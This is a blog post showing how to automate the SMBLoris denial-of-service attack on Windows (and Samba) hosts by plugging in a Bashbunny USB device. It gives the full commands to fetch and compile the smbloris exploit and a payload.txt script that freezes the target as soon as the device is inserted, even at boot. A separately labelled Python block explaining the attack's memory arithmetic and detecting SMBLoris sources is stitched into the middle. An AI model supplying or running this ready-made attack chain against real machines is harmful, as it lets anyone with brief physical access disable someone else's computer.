Bashbunny and SMBLoris

I was watching the Mr. Robot series recently and got the idea to configure the Bashbunny to automate the SMBLoris attack against a Windows system. The whole concept is really simple and I will explain in the following steps what needs to be done.

You can check the initial article regarding Bashbunny and Metasploit here https://astr0baby.wordpress.com/2017/05/23/bashbunny-with-metasploit-ms17_010_eternalblue-vs-windows-7-sp1-x64/

So let's first prepare the Bashbunny device (make sure you can ssh to the device and have Internet connection sharing set up; the setup is covered here). I have done all of the setup on a Linux system.

Make sure to set a plausible date, otherwise TLS/SSL certificate validation for apt and wget will fail: the Bashbunny has no battery-backed clock, so it boots with a bogus date ;)

# date -s "20170523"

Add this to /etc/apt/sources.list
deb http://http.us.debian.org/debian/ jessie-updates main
# apt-get update
# apt-get -y install autoconf build-essential

Now let's fetch the SMBLoris sources from marcan's gist (https://gist.github.com/marcan) and build the code on the Bashbunny

# mkdir /root/smb
# cd /root/smb 
# wget https://gist.githubusercontent.com/marcan/6a2d14b0e3eaa5de1795a763fb58641e/raw/565befecf4d9a4a27248d027a90b6e3e5994b5b6/smbloris.c
# gcc smbloris.c -o smbloris 

We are almost done; next we need to prepare the payload.txt on the Bashbunny (in the Switch 1 or Switch 2 payload directory) that runs the smbloris binary

#!/bin/bash
LED SETUP

# Enable Ethernet (RNDIS = Windows, ECM = mac/*nix)
#ATTACKMODE RNDIS_ETHERNET
#ATTACKMODE ECM_ETHERNET

ATTACKMODE RNDIS_ETHERNET
# Set some current time (the device has no battery-backed clock) ..... check your watch
date -s "20170823"
LED ATTACK
# Arguments: RNDIS interface, source address and netmask for the tool to use, target.
# 172.16.64.64 is the address the Bashbunny's DHCP server hands to the host;
# if the attack fires before the host has taken its lease, give it a short wait first.
/root/smb/smbloris usb0 1.1.1.1 255.255.255.254 172.16.64.64
LED FINISH

Now arm your Bashbunny and set the switch to the position whose directory holds the payload.txt.

We know the target IP will always be 172.16.64.64 (the address the Bashbunny's DHCP server hands to the host over the RNDIS link), so this makes it all too simple. All that is needed for this attack is an open TCP port 445 on the Windows machine. I have switched off the firewall for the test's sake. Below is a short video of the automated attack.


The machine under attack will come back to life after some time. The laptop I was testing this against is a Thinkpad x100e with 2 GB of RAM and it came back to life after about 3-10 minutes (I unplugged the Bashbunny immediately when the system froze), but the timing could differ depending on what is running on the machine. Also bear in mind that this attack can tie up at most about 8 GB of RAM (roughly 65,535 source ports times the 128 KB of non-paged pool that Windows reserves per connection), so machines with more than that will be OK. However, I have observed that if you leave the Bashbunny plugged in for longer (10 minutes) the system recovery takes much longer.
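As an added example (not code from the original post, from marcan's gist, or from the Bashbunny firmware), the following Python script makes two things from the paragraphs above concrete: how the NetBIOS Session Service header's 17-bit length field lets a client announce a 131071-byte message and then send nothing, so the server reserves about 128 KB of non-paged pool per idle connection (which is where the 8 GB per-address figure comes from), and a defender-side check that counts established connections to TCP/445 per peer address in an `ss -tn`-style connection table and flags any source holding far more sessions than a legitimate SMB client would. The connection table, the addresses in it and the 64-connection threshold are constructed for the example.

```python
"""Added example: NBSS header arithmetic behind SMBLoris plus a per-peer
SMB connection count that flags an SMBLoris-style source. Not part of the
original post; the sample connection table below is constructed."""
from collections import Counter

NBSS_LENGTH_BITS = 17
NBSS_MAX_LENGTH = (1 << NBSS_LENGTH_BITS) - 1   # 0x1FFFF = 131071 bytes
POOL_PER_CONNECTION = 128 * 1024                 # non-paged pool reserved per idle connection
PORTS_PER_ADDRESS = 65535                        # usable source ports per IPv4 address


def nbss_header(msg_type, length):
    """Encode a 4-byte NBSS header: type byte, then the 17-bit length
    (its top bit lands in the otherwise reserved flags byte)."""
    if not 0 <= length <= NBSS_MAX_LENGTH:
        raise ValueError("NBSS length must fit in 17 bits")
    return bytes([msg_type & 0xFF]) + length.to_bytes(3, "big")


def parse_nbss_header(hdr):
    """Decode a header back into (type, length); reserved flag bits are masked off."""
    if len(hdr) < 4:
        raise ValueError("NBSS header is 4 bytes")
    return hdr[0], int.from_bytes(hdr[1:4], "big") & NBSS_MAX_LENGTH


def pool_exhausted_by(connections):
    """Bytes of non-paged pool tied up by N idle SMBLoris connections."""
    return connections * POOL_PER_CONNECTION


def max_pool_per_source_address():
    """Upper bound one source address can tie up: every source port used once."""
    return pool_exhausted_by(PORTS_PER_ADDRESS)


def smb_connections_per_peer(conn_lines, local_port=445):
    """Count ESTAB connections to <local_port> per remote address.

    Lines mimic `ss -tn` output: state recv-q send-q local:port peer:port."""
    counts = Counter()
    for line in conn_lines:
        fields = line.split()
        if len(fields) < 5 or fields[0] != "ESTAB":
            continue
        local, peer = fields[3], fields[4]
        if int(local.rsplit(":", 1)[1]) != local_port:
            continue
        counts[peer.rsplit(":", 1)[0]] += 1
    return counts


def flag_smbloris_sources(conn_lines, threshold=64, local_port=445):
    """Return {peer_ip: (connection_count, estimated_pool_bytes)} for peers
    holding at least <threshold> established SMB connections."""
    return {
        peer: (n, pool_exhausted_by(n))
        for peer, n in smb_connections_per_peer(conn_lines, local_port).items()
        if n >= threshold
    }


# Constructed sample: one legitimate SMB client, some unrelated sockets,
# and one source (198.51.100.7) holding 3000 idle SMB sessions.
SAMPLE_CONNECTIONS = (
    ["ESTAB 0 0 192.0.2.10:445 192.0.2.20:51432",      # normal client: a single session
     "ESTAB 0 0 192.0.2.10:22 192.0.2.21:40002",       # unrelated SSH session, ignored
     "TIME-WAIT 0 0 192.0.2.10:445 192.0.2.22:40003"]  # not ESTAB, ignored
    + ["ESTAB 0 0 192.0.2.10:445 198.51.100.7:%d" % p for p in range(1024, 1024 + 3000)]
)

if __name__ == "__main__":
    hdr = nbss_header(0x00, NBSS_MAX_LENGTH)
    print("SMBLoris-style header:", hdr.hex(), "->", parse_nbss_header(hdr))
    print("one source address can reserve up to %.2f GB"
          % (max_pool_per_source_address() / 2 ** 30))
    for peer, (n, pool) in flag_smbloris_sources(SAMPLE_CONNECTIONS).items():
        print("%s: %d idle SMB sessions, ~%d MB of non-paged pool" % (peer, n, pool // 2 ** 20))
```

Feeding real `ss -tn` output in place of SAMPLE_CONNECTIONS turns this into a quick triage check on a Samba host; a normal client keeps one session per server, so even a threshold far below 64 is a strong signal.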

Obviously the same approach can be used against Linux/OSX hosts running Samba.

P.S. I have tried the Metasploit module auxiliary/dos/smb/smb_loris.rb but it is not as powerful as Hector's C code and does not freeze the host. (Possibly it is due to the limitation of the Bashbunny's 512 MB RAM and the Ruby requirements to load Metasploit.)

P.P.S. What is interesting, though, is that if you plug the armed Bashbunny into a target machine that is switched off, the attack starts as soon as the machine boots, rendering login almost impossible. The login screen just appears frozen until you disconnect the device. Even more interesting is the fact that after unplugging the device the machine stays frozen ...
